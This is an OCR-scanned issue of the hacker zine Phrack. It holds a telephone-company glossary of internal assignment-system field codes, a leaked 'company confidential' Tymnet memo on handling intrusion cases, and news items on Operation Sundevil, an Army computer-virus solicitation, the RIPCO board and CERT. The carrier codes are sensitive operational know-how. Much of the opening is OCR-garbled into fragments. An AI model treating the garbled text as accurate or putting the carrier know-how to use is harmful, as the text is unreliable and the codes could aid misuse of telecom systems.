mper Listing 
rmat When Completing Transfer Circuits with TOC 


e is Printed for Every Circuit in Range 
e Printed Only for Circuits not Completed 
rmat for Dial Transfer Number Lists 


ction GFR Output Format, One Facility per Line 
erification Test Format 


Marker Gro 
MG X 

X=0-9 
Minimum P 


ne Condensed Format 
up Number 


N XXX 
X=Maximu 
lti-loop 
XX 
=Two Num 
dule Num 
D XXX 
X=Three 
egrated 
E X 

Tl Car 
2=3 Tl Car 
Master Wor 
MPN XXXX 
XXXX=1-999 


a 
I 
x 
u 
L 
XX 
Mo 
O 
x 
n 
O 


t 
D 
i) 


reentage Value of Entity Fill or Minimum CCS Value 


m of 3 Numeric Characters 
Resistance Zone Threshold 


eric Characters 
ber 


Numeric Characters 
SLC No. 5ESS Mode 


rier Channels 
rier Channels 
k Package Number 


9 


Message R 
MR XXXXXX 
XXXXXX=Max 
Message R 


gister 


imum of 6 Alphanumeric Characters 


MRO XXX 
XXX=YES or 
Master Rec 
MT X 
X=Numeric 


gister Option 


NO 
ord Tape Unit Number or Tape Drive to Write 


to Read 


ape Driv 
MTR X 
X=Numeric 
Tape Drive 
MTW X 
=Numeric 
AC Assign 
AR XXX 


x 

N 

N 
XXX=Maximu 
Number Gro 
NGF XXX 
XXX=Three 
Telephone 
NNX XXX 
XXX=THree 


to Write 


ment Review 


m of 3 Numeric Characters 
up Frame for 5XB 


Numeric Characters 


= 


Exchange Code 


Numeric Characters 


OA 


OC 


OCS 


OD 


OGO 


OPT 


ORD 


OT 


PBX 


PCID 
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Number of OEs to be Assigned 

NOE X 

X=0 or 1 

Area Code and Exchange Number 

NPA XXXXXX 

XXXXXX=Six Alphanumeric Characters 


Normalizing CCS VAlue 
NRM XX 
XX=0-99 
Number of TNs to be Assigned 
NTN X 
X= 


ine Equipment Assignment Option 


Order Category 

OC XXX 

ACT=Assignment Change Ticket 

ALL=All OE Load Factors 

CPC=Special Service 

FM=Count Since OE Input Features Occurrences 
FO=Count All OE Input Feature Occurrences 
HOT=Frame Ouput-urgent 

JR=Jeopardy Reason 

Old Class of Service 

OCS XXXXXX 

XXXXXX=Maximum of 6 Alphanumeric Characters 
Output Device 

OD XXXX 
=Send Output to Current Terminal 

[XX=Send Output to Specified Terminal XX 

MTX=Send Output to Magnetic Tape X 

Office Equpiment Number 

OE ID 

(See MASK) 

Outgoing Only Trunk 

OGO XXX 

XXX=Maximum of 4 Numeric Characters 

Party Assignment Option 

OPT X 

1=Assign Multi-party Customers to Spare Party Equipment 

2=Assign Multi-party Customer to Partially Equipped Party Equipment 
3=Assign Only One Multi-Party Customer to each Single Party Equipment 
Service or Work Order 

ORD XX...XX 

XX...XX=Maximum of 20 Alphanumeric Characters 

Service or Work Order Type 

OT XXX 

BT=Background Transfer 
CD=Complete Disconnect 
CH=Changed 
Cc 
EF 


TO=Company Initiated Orders 
="F ROM" 
ET=Line Equipment Transfers 
iST=Line and Station Transfers 
MCE=Maintenance Change by LAC 
MCR=Maintenance Change by Repair 
MCT=All Maintenance Changes 

NC=New Connect 

R=Remarks 

REA=Pending Reassociation 

SW=Swap 

ea To" 

Private Branch Exchange 

PBX XXXX 

XXXX=Maximum of 4 Numeric Characters 
Primary Circuit Identification 
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PCID XX...XX 

XX...XX=Maximum of 61 Alphanumeric Characters 
PKT Picket Fence Values 

PKT XXX.X,...,XXX.X 


XXX.X,...,XXX.X=Nine sets of Four Numeric Characters or 
N=No New Values 
PL Private line Circuit Number 


PL XX...XX 

XX...XX=Maximum o 

PNL PREMIS Number Lis 

PNL XX...XX 
XX...XX=Maximum of 12 Alphanumeric Characters 

POP ine Equipment Print Option 

POP XXX 

CNC=Concentrator-l1ESS, 2ESS, 3ESS, RSS 

CNG=Concentrator Group-2ESS, 3ESS 

HG=Horizontal Group-5XBAR 

IM=Interface Module-5ESS 

FG=Line Finder Group-SxXs 

\LF=Line Link Frame-5XBAR 

LLN=Line Link Net-1ESS 

LTN=Line Trunk Net-2ESS 

LU=Link Unit Module-5ESS 
QC=Quarter Choice-1XBAR 
SW=Switch-1LXBAR 
VF=Vertical FIle-5XBAR 

PR Cable Pair ID 
PR YXXX 
Y=Alphanumeric 
XXX=Numeric 

PRI Frame Priority 

PRI XX 

XX=Two Numeric Characters 

PRP Permanent Cable Pair Remarks 

PRP XX...XX 

XX...XX=Maximum of 14 Alphanumeric Characters 

PRZ Preferred Rate Zon 

PRT X 

X=Numeric 

PS Previously Published/Non-published Facility Indicator 

PS X 

N=Non-Published 

!'=Published 

PT Package Time 

PT XXX 

XXX=Three Numeric Characters 

PTY Party Number or Position 

BLY oC 

X=1-4 

PTY Party Indicator 

PTY X 

R=Reserved 

O=Open 

PWC PREMIS Wire Center 

PWC XX...XX 

XX...XX=Maximum of 8 Alphanumeric Characters 

PWC Print Work Code 

PWC XXX 

NBT=No Back Tap 

COM=Frame Complete 

PBT=Print Back Tap 

RCT=Place Heat Coils on "TO" Pair 

RBT=Remove Back Tap 

RCF=Remove Heat Coils on "FROM" Pair 

VBT=Verify Back Tap 

USX=Locally Defined Codes (X=1-4) 

RAP Rotary Assignment Priority 

RAP X 


Fh 


61 Alphanumeric Characters 
for TN 


ct 
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X=Numeric 

RCT Recent Change Type 
RCT XX 
1=1ESS Office 
1A=1AESS Office 


2=2ESS (LO1) 
2E=2ESS (EF1 and EF2) 
3=3ESS 
5T=5ESS 
RCW Recent Change Keyword 


RCW XX...XX 
XX...XX=Maximum of 20 Alphanumeric Characters 
RD Release Date 
D MM-DD-YY 


DG XXXX 

XXX=Four Numeric Characters 
ecord File Name and Number 
EC FFXXXXXX 

FF=File Name (Alphanumeric) 
XXXXXX=Record Number (Maximum of 6 Numeric Characters) 
REP Reprint Option 

REP X 

Y=Yes 

N=No 

RESP Send a Solicited Response 
RESP X 

=Solicited Response 

ework Status 


R 
M 
D 
Y 
RDG Message Register Reading 
R 
xX 
R 
R 


RLF Re-using DIPs Upper Bound Load Factor 
LF X 


LO X 


RLY Miscellaneous Relay 

RLY XX...XX 

XX...XX=Maximum of 10 Alphanumeric Characters 
RMK Remarks on Orders 
K XX...XX 
...XX=Maximum o 
nt Group Remark 
KG XX...XX 
...XX=Maximum of 30 Alphanumeric Characters 
marks on Office Equipment 
KO XX...XX 
...-XX=Maximum of 12 Alphanumeric Characters 
marks on Cable Pair 
KP XX...XX 
...-XX=Maximum o 
marks on Teleph 
AT XX ek 
...XX=Maximum of 14 Alphanumeric Characters 
SS Subentity Number 

NO XX 

XX=01-63 

RTI Route Index 

RTI XXXX 

XXXX=Maximum of 4 Numeric Characters 

RTYP Relay Type 

RTYP XXX 


xx Ss 


28 Alphanumeric Characters 


xis GS 
nN Pm 


zo 


x < O 


14 Alphanumeric Characters 
Number 


oO Mm 
1 


a0) 


x 


Dox DWDM DW 2 Dox DOK Ww 


6.txt Wed Apr 26 09:43:38 2017 20 


TBA=Tens Block Auxiliary 
SC=Sleeve Connect 
AR=Advance 
RTZ Rate Zone 
RTZ X 
X=Numeric 
RW Recent Change Work 
RW X 
N=Recent Change Message not Required 
C=Recent Change Coordination Required 
RZ Resistance Zone 
RZ XX 
XX=Two Numeric Characters 
SBS Sub-status 
SBS X 
A=Area Transfer 
C=Cut Through 
D=Dedicated 
L=Cut Through and Dedicated 
'=Blank 
SC Sleeve Connect Relay 
SC SYY-Z22Z 
S=Marker Group (Numeric) 
YY=Number Group Frame (Numeric) 
ZZZ=Relay Number (Numeric) 
SE Special Service Equipment Number 
SE XX...XX 
XX...XX=Maximum of 52 Alphanumeric Characters 
SET Single Entity Tag 
SET X 
Y=CP is Served by a Single Entity on a Single Frame 
'=CP Can be Served by More Than One Entity 
SG Service Segment 
SG X 
B=Business 
C=Coin 
D=Data 
R=Residence 
S=Special 
SGN Common Language Segment Number 
SGN XXX 
XXX=Maximum of 3 Alphanumeric Characters 
SIS Special Identifying Telephone Number Supplement 
SIS XXXX 
XXXX=Maximum of 4 Numeric Characters 
SIT Special Identifying Telephone Number 
SIT XXX-YYY-XXXX 
X=Numeric 
Y=Numeric 
SK Skip Option 


SK X 
X=0 or 2-9 
SN Sequence Number 
SN XXX 
XXX=1-999 
SOB Service Observing Tag 
SOB XXX 
XXX=YES or NO 
SS Suspension Status 
SS XX 


DB=Deny Both Ways 

DI=Deny Incoming 

DO=Deny Outgoing 

RS=Restore Suspended Circuit 
SB=Suspend Both Ways 
SD=Season Disconnect 
SI=Suspend Incoming 
SO=Suspend Outgoing 
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SSV 


STAT 


STAT 


STAT 


STO 


STP 
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DX=Deny Toll Access Tervice 
Suspend Service Typ 

SSV XX 

DO=Deny Outward Service 


21 


DB=Deny Both Outward and Inward Service 


DX=Deny Toll Access Service 
RS=Restore Denied Servic 

Order Status 

STAT XX 

AC=Pending With no Framd or Instal 


lLlation Completion 


FC=Pending With Frame Completion but no Installation Comp] 


IC=Pending with Installation Comp] 
CC=Completed Orders 

CA=Canceled Orders 

Facility Status 

STAT XX 

AS=All Spare 

EX=Excluded 

PC=Pending Connect 

RS=Reserved 

SF=Spare Facility 

UK=Unknown 

WK=Working 

Load Group Status 

STAT XX 

EX=Blocked from all Assignments 


PS=Pseudo LEN Assignments Only 


WK=Open for All Assignments 
ine Equipment Status 

STO XX 

AW=Al1 Working 
MS=Miscellaneous 
OF=Official 

TJ=Trunk and Junctor 
TS=Test 

WK=Working 

PD=Pending Disconnect 

PK Pending Disconnect/Pending New 
AS=Al1l Spare 

EX=Excluded 

I=Left-in Disconnect 
RS=Reserved 

SF=Spare 

UK=Unknown 

PC=Pending Connect 

Cable and Pair Status 

STP XX 

AL=All Pairs 

AD=All Defectiv 

AP=All Provisioned 

AW=Al11 Working 

DC=Designed Circuit 
DI=Defectiv (I=1-9) 
DM=Designed + SSM 
DP=Designed + SSP 
SM=Special Safeguard Measures 
SP=Special Safeguard Protection 
SS=Special Status 
WK=Working 

AS=All Spare 

EX=Excluded 

[=Left-in Disconnect 
RS=Reserved 

SF=Spare 

UK=Unknown 

PC=Pending Connect 


letion 


lation but no Frame Comp] 


FU=Open for Dial Transfer Assignments Only 


SO=Open for Service Orders and Work Orders Only 


Connect 


letion 
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STT 


SUBL 


SWC 


SWG 


SYS 


TA 
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PD=Pending Disconnect 
Telephone Number Status 
STT XX 
AU=Auxiliary 

AW=Al1 Working 
MS=Miscellaneous 
NP=Non-published 
OF=Official 
J=Trunk and Junctor 

rS=Test 

WK=Working 

AS=Al1l Spare 

AV=Available 

CM=Changed-Machine Intercept 
CO=Changed-Operator Intercept 
DM=Disconnected-Machine Intercept 
DO=Disconnected-Operator Intercept 
EX=Excluded 

RS=Reserved 

SF=Spare 

UK=Unknown 

PC=Pending Connect 

PD=Pending Disconnect 

PK=Pending Disconnect/Pending New Connect 
Sublet Service 

SUBL XXX-XXXX 

XXX-XXXX=Telephone Number 

Set Work Code 

SWC XXX 

(See Print Work Code) 

Switch Group 

SWG X 

X=0-2 

Machine Number 

SYS XX...XX 

XX...XX=Maximum of 12 Alphanumeric Characters 
Transfer Assembly 

TA X 

Y=Yes 

N=No 

Touchtone Assignment Priority Number 

TAP X 

X=Numeric 


BA 


TBS 


BA Relay 

TBA XYY-ZZ2Z 

X=Marker Group Number (Numeric) 
YY=Number Group Frame (Numeric) 
ZZZ=Relay Number (Numeric) 

TBS Relay 

TBS XZ-NN 

X=Marker Group Number (0-9) 
Z=Relay Number (0-3) 

NN=Ringing Combination (01-16) 


O Cable 
dip, Ga, ©, Crarmao.<0,€ 
XX...XX=Maximum of 10 Alphanumeric Characters 


erminal 
ER XXXX 
XXXX=Maximum of 4 Numeric Characters 


THG 


Terminal Number 

TER Y-XXXX-ZZ2Z2Z 

Y=Control Group (Alphanumeric) 
XXXX=Group Number (Numeric) 
ZZZZ=Terminal Number (Numeric) 
Thousands Group 

THG X or 

THG XXXX 

X=0-9 
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XXXX=0000,1000,...,9000 
TK Trunk Cable and Pair Number 
TK YYYYYY-XXXX 
YYYYYY=Cable ID (Maximum of 6 Alphanumeric Characters) 
XXXX=Cable Pair ID (Maximum of 4 Numeric Characters) 
TLI Telephone Line Identifier 
TLIO XXX-YYY-XXXX 
X=Numeric 
Y=Alphanumeric 
N lephone Number 
TN XXX-XXXX 
XXX-XXXX=Telephone Number 
TOM Two or More Non-pending, Non-party Filtered Circuit Facilities 
TOM XX 
CP=Cable Pair 
TN=Telephone Number 
OE=Office Equipment 
TP Tie Pair 
TP YY...YY-XXXX 
YY...YY=Cable ID (Maximum of 10 Alphanumeric Characters) 
XXXX=Tie Pair ID (Maximum of 4 Numeric Characters) 


[TPR aper Code 

TPR XXXXXX 

XXXXXX=Maximum of 6 Alphanumeric Characters 
RE Transmission Equipment 

[TRE XX...XX 


XX...XX=Maximum of 17 Alphanumeric Characters 


rT [Telephone Number Typ 
TX 
B=POTs Hunting 
C=Coin 
G=Complex Servic (Direct Inward Dialing, Radio Common Carrier, etc) 
O=Official 
Q=Cent rex 
X=POTx Non-hunting 


TA Terminating Traffic Area 
TTA XXX 


TYP XXX 

1ES=Number 1ESS 
2ES=Number 2ESS 
3ES=Number 3ESS 
5ES=Number 5ESS 


RSS=Remote Switching System 
1XB=Number 1 Cross-bar 
5XB=Number 5 Cross-—bar 
SXS=Step-by-step 
DMX=DMS-10 
DMC=DMS-100 
US USOC 
US XXXXX 
XXXXX=Maximum of 5 Alphanumeric Characters 
USE Entity Usage 
USE X 
G=Growth 
S=Stable 
VAL Minimum Valid Hours for Entity Data 
VAL XX 
XX=1-99 
WC Wire Center 
WC XX 
XX=Alphanumeric 
WL Work Location 


WL Y 

Y=1-8 or 

WL XXX 
ADM=Administrative 
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ACT=Assignment Change Ticket 

CPC=Special Service Circuits 

MCT=Maintenance Change Tickets 
WPN Work Package Number 

WPN XXXX 

XXXX=1-9999 
WPT Work Package Type 

WPT XXX 

XXX=Maximum of 3 Alphanumeric Characters 
XN "xX" Number 

XN XXX-YYXX or 

XN XXX-YXX 

X=Numeric 

Y=Alphanumeric 
ZN Zone Location 

ZN XXX 

XXX=001-999 
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==Phrack Inc.== 

Volume Three, Issue Thirty-one, Phile #7 of 10 
COMPANY CONFIDENTIAL 

INTERIM MEMORANDUM 


SUBJECT: TYMNET SUPPORT FOR CUSTOMER’ S DATA SECURITY 
PURPOSE: This document provides background, and general procedures 
and practices used to support customers with suspected security 
problems. Field Sales is the intended audience but is a general 
document and may be useful to other customer support personnel. 
Currently, this document is in a final review. Meanwhile, it is to 
retain the status of an internal proprietary document. 

BACKGROUND: BT Tymnet Inc, and its Network Systems Company, 
believe information integrity is vital to ourselves and our 
customers. One way TYMNET insures integrity is by providing good 
security. TYMNET has a baseline security of user name, password, 
and user access profile available for all customers. Further, there 
are two security products. One permits the customer to limit 
password life (password automatically expires after a customer 
lected time period) and the other permits the end user to change 
his/her own password. Since we do consider security a key issue, 
we continue to develop other security features. Also, we work with 
Security vendors to certify their security products on our network, 
thus permitting customers to add such products, should they so 
desire. 
We have established Network Systems Company Policies which provide 


a framework for the information contained herein (s NSC Policy 
121 and 122. More policies are in distribution as of this 
writing). It is highly recommended that these policies be reviewed 


Since they represent the framework of this document. 

Legal considerations are another key issue in any security case. 
Support, other then providing the customer with related security 
data, can only occur if law(s) have been broken. The 

legal issues are complex and only a minimal information is 
provided herein. At at the heart of this issue is the fact that 
the customer is the injured party, not TYMNET. Patience and good 
communication may be required to get the customer to understand 
this fact. The customers must act for themselves to obtain 

law enforcement support. TYMNET will support that activity, and 
help to the degree possible, much as a "friend of the court". 

THE SUPPORT: We provide security support as a responsible 
network service provider. The first step in that support is for 
the field sales representative to act as a security consultant to 
the customer, at least to the extent explained below. 

The customer is well advised to plan in advance "what to do 


when Captain Midnight strikes" -- contingency planning, pure 
Simple. First there are two basic alternatives to choose from: 
PROTECT AND PROCEED 
OR 
PURSUE AND PROSECUTE 


"Protect and proceed" means 1) determine how the incident 

occurred, 2) plug the security leak/hole, and 3) go on with 

business as normal. 

(Do we want written notification of the Intent to "Pusue and 
Prosecute" from the "Injured Party?"). 

"Pursue and prosecute" is just that. The first step is having 

the customer obtain legal support, and both we and the customer 
continue to gather evidence until the suspect is apprehended. The 
next step is the prosecution in a court of law. (The final step is 
to return to the first alternative, e.g., now protect and 

proceed. ) 

The customer needs to judge each case on its own merits, but 
generally the first choice is the wiser one. The second choice 
involves considerable effort, mostly by the customer and law 
nforcement agency(s), possible negative publicity for the 
customer and does not necessarily result in successful prosecution. 
Good contingency planning also includes becoming familiar with the 
laws and the local law enforcement peopl 
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The starting point is a suspected incident. Herein, we will address 
the case where the customer has identified a suspected intruder. 
Generally, that occurs by a customer’s detailed review of billing 

or host based security exception reports. 

At this point it is essential the field sales representative open a 
ticket containing at least the following: 1) customer name and CID, 
2) host(s) involved, 3) incident start and stop times, and 4) the 
customer’s objective. Add any other information deemed helpful. 
Other support may be an on-line trace of the call, if the 

suspect is currently on-line. Field support should do this trace, or 
alternately, this same help can be obtained by calling network 
customer support and/or NetCon. In any case it must be done while 
the suspect is on-line. Such trace information should be 

included on the ticket. 

Based on the customer’s position; the case will fit either 

"prevent and proceed" or, "pursue and prosecute". The former is 
straight forward, in that TYMNET security will research the 
incidents(s), and provide data (generally user name and point of 
origin(s) to the customer via Field Sales, with recommendations 

on how to prevent any further occurrence. We do provide this 

service as a responsible vendor, although strict interpretation 

of NSC policy 121 precludes it. However, we do apply the policy if 

a customer continues to ask for data without taking preventative 
action. 

The "pursue and prosecute" case is complex, and is different for each 
Situation. It will be explained by using a typical scenario. After 
the first step (as above), it is necessary to gather data sufficient 
to show a pattern of intrusion from a single TYMNET access point. 
With this information, the customer (the injured party) must contacts 
law enforcement agency(s), with the one exception noted below. 

If that intrusion point is through a gateway from a foreign 

country, for all practical purposes, the customer can do little to 
prosecute. The law(s) of the foreign country will apply since 
extradition is most unlikely. Therefore, action will have to be 

have to be initiated by the network service provider in the 

foreign country. In this case, TYMNET security will have MIS 
research the session details to obtain the Network User 

Identifier, and External Network Support (Jeff Oliveto’s 
organization) will communicate that information to the foreign 
network for their action (cases involving U.S. government computers 
may get special treatment s for exampl Communications of the 
ACM, May, 1988, article on "Stalking the Wiley Hacker"). 
Most all security incidents on our network are caused by international 
hackers using X.121 addressing. Frequently, our customer is unaware 
of the risk of X.121 addressing, and permits it. BE SURE YOUR 
CUSTOMERS KNOW THAT THEY CAN CHOOSE FULL TYMNET SECURITY FEATURES, 
THEREBY PRECLUDING SUCH INTRUSIONS FROM X.121 ADDRESSING FROM 
FOREIGN NETWORKS. 
For the domestic case, the customer gets law enforcement (attorney 
general at incoming call location, secret service if credit card 
fraud is involved, or possibly the FBI, depending on the incident) 
to open a case. Note, damage in estimated dollars is usually 
necessary to open a case, and many agencies will not take action on 
small claims. For example, as of December, 1988, the Los Angeles 
Attorney will not open a case for less than $10,000 (they have too 
big a caseload at higher damages). 

Assuming legal support is provided, a court order for a wire tap 

and trace will be obtained, thereby determining the caller’s phone 
number (this step can be very involved and time consuming for long 
distance calls). The next legal action occurs after the calling 
number is identified. A search warrant is obtained for searching the 
facility housing the phone location. Normally, this search will 
gather evidence sufficient for prosecution. Evidence is typically 
the necessary terminal equipment, printouts, diskettes, etc. Then, 
at long last the prosecution. Also note, again at the time the 
calling number is identified, the injured party should use the 
"protect and proceed" plan. 
For further information, contact Data Security, TYMNET Validations, 


7.txt Wed Apr 26 09:43:38 2017 
or Ontyme NSC.SECURITY. 


8.txt Wed Apr 26 


09:43:38 2017 1 


==Phrack Inc.== 


Volume Three, Issue Thirty-one, Phile #8 or 10 
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN 


PWN 
PWN 
PWN 


Phrack World News 
Issue XXXI, Part One 
Compiled by Phreak_Accident 


PWN 
PWN 
PWN 


PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN 


Operation "Sun-Devil" 


May 9th and 10th brought on two day thats would be marked in 


very hackers 


history book. The reason we assume these days will be important to many, is 
that maybe it’s time we opened ar yes and saw the witch hunt currently in 


progress. 


In less than 48 hours, 150 Secret Service men and other law officials 
served 30 search warrents in 14 cities around the nation (This thing was hudge). 
Operation "Sun-Devil" (As the Attorney General in Phoenix called it), was 


a success on their part. "The investigation though is not over, 


and there are 


more warrents to be executed.", said Jim Folwer of L.A’s Secret Servic 
Any details of the investigation are not being given out at this time. 


The Asst. Attorney General of Pheonix told Phrack Inc. that ther 


were other 


problems involving the investigation and that it was an ongoing investigation 


for the last TWO years. 


It is my understanding that Gail Thackeray and the Secret Service are not, 


taking this lightly. She told Phrack inc. that they are not distinquishing 


pirates, hackers, or phreakers. Basically, it’s any kid with a modem that calls 
a BBS with an alias. Yes, we are the witches, and we are being 
hunted. 


The following are Two news releases obtianed via fax through the U.S. 


Secret Service for Phrack Inc. 


N 
FOR IMMEDIATE RELEAS 


Ws RELEASE 
CONTACT: Gail Thackeray 
Assitant Attorney General 
May 9, 1990 @ 11:00 A.M. (602) 542-4266 


Fl 


Attorney General Bob Corbin announced today that in 
connection with an eighteen-month joint investigation into 
computer crime conducted with the United States Secret 
Service and the United States Attorney’s office, the Arizona 
Attorney General’s office has executed seven search warrants 
in which computers, electronic bulletin boards, telephone 
test equipment and records have been seized. 

The Organized Crime and Racketeering Division 
investigation involved complaints by Arizona and out of state 
victims of substantial financial losses resulting from credit 
card fraud and theft of long distance telephone and data 
communications services, and by victims of attacks on 
computer systems operated by government agencies, private 
corporations, telephone companies, financial institutions, 
credit bureaus, and a hospital. 

The Arizona Attorney General’s office received 
information and technical assistance from the Glendale, 
Arizona Police Department’s Computer Crime Unit, and from 
many private sector sources, including Bellcore (Bell 
Communications Research), American Express, Communications 
carriers U.S. Sprint, AT&T, MCI, Com Systems, MidAmerican 
Communications, LDL Communications, and Shared Use Network. 
Without the cooperation of these companies and of numerous 
federal, state and local law enforcement agencies around the 
country, this investigation would have been impossible. 

The privacy of our citizens and the health of our 
economy depend upon secure, reliable computer systems. 
Computer fraud and attempts to compromise senstitive public 
and private computer systems will not be tolerated. 
Individuals who commit these offenses in Arizona can expect 
to be prosecuted. 
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PRESS RELEASE 
FOR IMMEDIATE RELEASE Contact: Wendy Harnagel 
Wednesday, May 9, 1990 United States Attorney’s Office 
(602) 379-3011 
PHOENIX -- Stephen M. McNamee, United States Attorney 
District of Arizona, Robert K. Corbin, Attorney General for 
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he State of Arizona, and Henry R. Potosky, Acting Special 
gent in Charge of the United States Secret Service Office in 
hoenix, today announced that approximately twenty-seven 
earch warrants were executed on Monday and Tuesday, May 7 
nd 8, 1990, in various cities across the nation by 150 
cret Service agents along with state and local law 
nforcement officials. The warrants were issued as a part of 
peration Sundevil, which was a two year investigation into 
lleged illegal computer hacking activities. 
The United States Secret Service, in cooperation with 
he United States Attorney’s Office, and the Attorney General 
or the State of Arizona, established an operation utilizing 
ophisticated investigative techniques, targeting computer 
ackers who were alleged to have trafficked in and abuse 
tolen credit card numbers, unauthorized long distance 
ijaling codes, and who conduct unauthorized access and damage 
o computers. While the total amount of losses cannot be 
alculated at this time, it is estimated that the losses may 
un into the millions of dollars. For example, the 
nauthorized accessing of long distance telephone credit 
ards have resulted in uncollectible charges. The same is 
rue of the use of stolen credit card numbers. Individuals 
re able to utilize the charge accounts to purchase items for 
hich no payment is made. 
Federal search warrants were executed in the following 
ities: 


Chicago, IL 

Cincinatti, OH 

Detroit, MI 

Los Angeles, CA 

Miami, FL 

Newark, NJ 

New York, NY 

Phoenix, AZ 

Pittsburgh, PA 

Plano, TX 

Richmond, VA 

San Diego, CA 

San Jose, CA 

Unlawful computer hacking imperils the health and 
elfare of individuals, corporations and government agencies 
n the United States who rely on computers and telephones to 
ommunicate. 

Technical and expert assistance was provided to the 
nited States Secret Service by telecommunication companies 
ncluding Pac Bel, AT&T, Bellcore, Bell South, MCI, U.S. 
print, Mid-American, Southwestern Bell, NYNEX, U.S. West, 
nd by the many corporate victims. All are to be commended 
or their efforts for their efforts in researching intrusions 
nd documenting losses. 

McNamee and Corbin expressed concern that the improper 
nd alleged illegal use of computers may become the Whit 
ollar crime of the 1990’s. McNamee and Corbin reiterated 
hat the state and federal government will vigorously pursue 
riminal violations of statutes under their jurisdiction. 
hree individuals were arrested yesterday in other 
urisdictions on collateral or independent state charges. 


The investigations surrounding the activities of Operation 


undevil are continuing. 
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The investigations are being conducted by agents of the 
United States Secret Service and Assistant United States 
Attoryney Tim Holtzen, District of Arizona, and Assistant 
Arizona Attorney General Gail Thackery. 


.end. 


Virus mania 


Robert T. Morris started it all. Who cares, it’s over and done with. 
Never the less, it’s being dragged out in every national paper. It’s old news 
so we won’t cover it here, but we will tell you about something the Army has up 
its sleeve. 

Army is Looking for a Few Good Viruses 
By Rory J. O’conner 
Knight—-Ridder Newspapers 


The U.S. Army is looking for help to develop the seeds of a new-age germ 
warfare: It wants business to help it turn computer "viruses" into military 
weapons. 
Experts predict the viruses, if sucessfully developed, could be used to 
wreak havoc on the increasing number of computers in the battlefield. The 
destructive computer programs which have increasingly damaged commercial and 
research computer systems in the past four years, could be used to disrupt 
military communications and feed misleading data to enemy commanders. 

The viruses could aslo be used to alter the programming of crucial 
communications satellites serving combat units, the experts said. 

The Army is soliciting bids from small businesses to determine the 
feasibility of using computer viruses in warefare. And it is willing to pay up 
to $550,000 to a company that comes up with a plan for creating the programs -— 
and figures out how to use military radio systems to introduce them into enemy 
computers. 

A computer virus is a kind of program designed to disrupt normal operation 
of a computer system or damage data ont hat system by altering or destroying 
it. The rogue programs are most effective when introduced secretly into the 
computer system of an unsuspecting user and when their damage is subtle or 
hidden fromt he user for some time. 

Viruses are also self-duplicating and can spread undetected from an 
infected computer to other computer systems they contact. 

So far, more than 60 computer viruses have been identified, most of them 
attacking poorly guarded personal computers used by businesses, universities 
and inividuals. The Army’s virus would have to be more sophisticated than 
those programs. 

But some detractors of the concept say the Army could wind up with the 
same problem it has with biological weapons: Creating destructive elements 
that might get loose and cause widespread damage to its own forces as well as 
civilians. 

"This stuff is very dangerous, and most people involved in creating 
viruses are not aware of the threat," said a Bay Area virus expert who asked ot 
to be named. "You can’t spread anthrax around the world and not have it come 
back around to you. And the enemy is using the same kind of computers and 
software that we are." 

Many experts who are fighting the explosion in virus activity by amateur 
programmers are especially angry at government efforts to develop the programs 
for the military. Some say it is particulary troubling in light of the 
sentencing of Robert T. Morris Jr. (Ed —-Ick), convicted in federal court of 
sending a similar program through a government sponsored network in 1988. 

"It bothers me that the government says in one breath (viruses) are bad 
and illegal and then asks for someone to develop them," said Glenn Tenney, a 
San Mateco, Calif., programmer and organizer of the annual Computer Hackers 
Conference. "If Morris had done the same thing for the Army, they’d have paid 
him hundreds of thousands to do it. But he did it on the wrong side and got 
punished." 

Computer experts say creating a virus to the Army’s specifications is 
possible with current technology - although some of the Army’s requirements 
could make developing it more difficult than creating an ordinary personal 
computer virus. 

First, military computer systems are usually designed with far more 
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security features than commercial systems, making it much harder for a virus to 
nter the systems. Second, the Army is emphasizings the use of radio 
communication to inject the virus into enemy systems. Normally, computer 
viruses spread through the exchange of floppy disks that contain the rogue 
program or along wires connecting several computers. Using complex military 
radio signals instead would requir xpertise that mose programmers don’t have. 
.end 


RIPCO May 8th, 1990 


Operation Sun-Devil claimed more than just a few "Codelords" around the 
states, it claimed one of the oldest and more popular boards. Nobody knows 
when or if RIPCO shall return. 

Reportedly, Dr. Ripco was charge on a hand-gun violation after his house 
was searched. Phrack inc. can’t comment on this. 

The following is the exact transcript of the message left on RIPCO’s 
answering maching after Operation Sun-Devil. 


This is 528-5020. 

As you are probably aware, on May 8, the Secret Service conducted a series 
of raids across the country. Early news reports indicate these raids 
i 
1 
B 


nvolved people and computers that could be connected with credit card and 
ong distance toll fraud. Although no arrests or charges were made, Ripco 
BS was confiscated on that morning. It’s involvement at this time is 
unknown. Since it is unlikely that the system will ever return, I’d just 1 
say goodbye, and thanks for your support for the last six and a half years. 
It’s been interesting, to say the least. 

Talk to ya later. 

{Dr. Ricpo} 


**x* END OF VOICE MESSAGE *** 
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{C}omputer {E}mergency {R}esponse {T}eam 


Some call it "Internet Police" -- Others call it "just stupid." 
CERT however is a mix. But I do give them credit After all, have your 
number one goal being ’making the Internet more secure’ has to be a tough task. 
Therefore, we give them credit. 
However, CERT is funded by DARPA, which is a government agency. And 
anything in my book that the government runs is bad news. Yes, the government 
pays the 6 man salary and keep their hot-line active 24 hours a day. 

Ahh.. What do you know about CERT? "Nothing" you say? Well, the 
following is the press release and other reprints of information about CERT. 


Richard Pethia <rdp@SEI.CMU.EDU> 

DEAR XXXXXXXXX, 

I have been reviewing our correspondence files and have discovered 
that your request for information may not have been filled. I 
apologize for the delay and hope that the information is still useful 
to you. If, after reading the following, you have additional 
questions or would like to subscribe to one of our information lists, 
please send email with your question/request. 

The Computer Emergency Response Team (CERT) was established by the Defense 
Advanced Research Projects Agency in November of 1988 to serve members 

of the Internet Research community. The press release below describes 

the general role of the CERT. 

More specifically, the CERT supports individual Internet sites by: 

-Working with site personnel to help resolve individual computer security 
incidents. Contact potentially affected sites to warn them of 
possible security breaches. Work with sites to change the 
conditions that allowed incidents to occur. 

-Issuing advisories that alert the community to specific system 
vulnerabilities or intrusion techniques, as well as the methods to 
protect against them. 

-Working with the community and system (primarily Unix) vendors to 
reslove specific system vulnerabilities. 

—-Maintaining and operating moderated mailing lists that: (1) provide a 
discussion forum for tools and techniques to improve the security of 
Unix systems, and (2) provide a discussion forum and alert mechanism 
for PC viruses, trojan horses, etc. 

Over the past year we have developed hundreds of working relationships 
with members of the Internet and other communities and have 
established an extensive information collection and dissemination 
network. Because of this network of cooperating individuals and 
organizations, we are often able to advise the community of problems 
allowing them to take corrective action before being affeceted by 
those problems. 


No. 597-88 
(202) 695-0192 (Info.) 
(202) 697-3189 (Copies) 


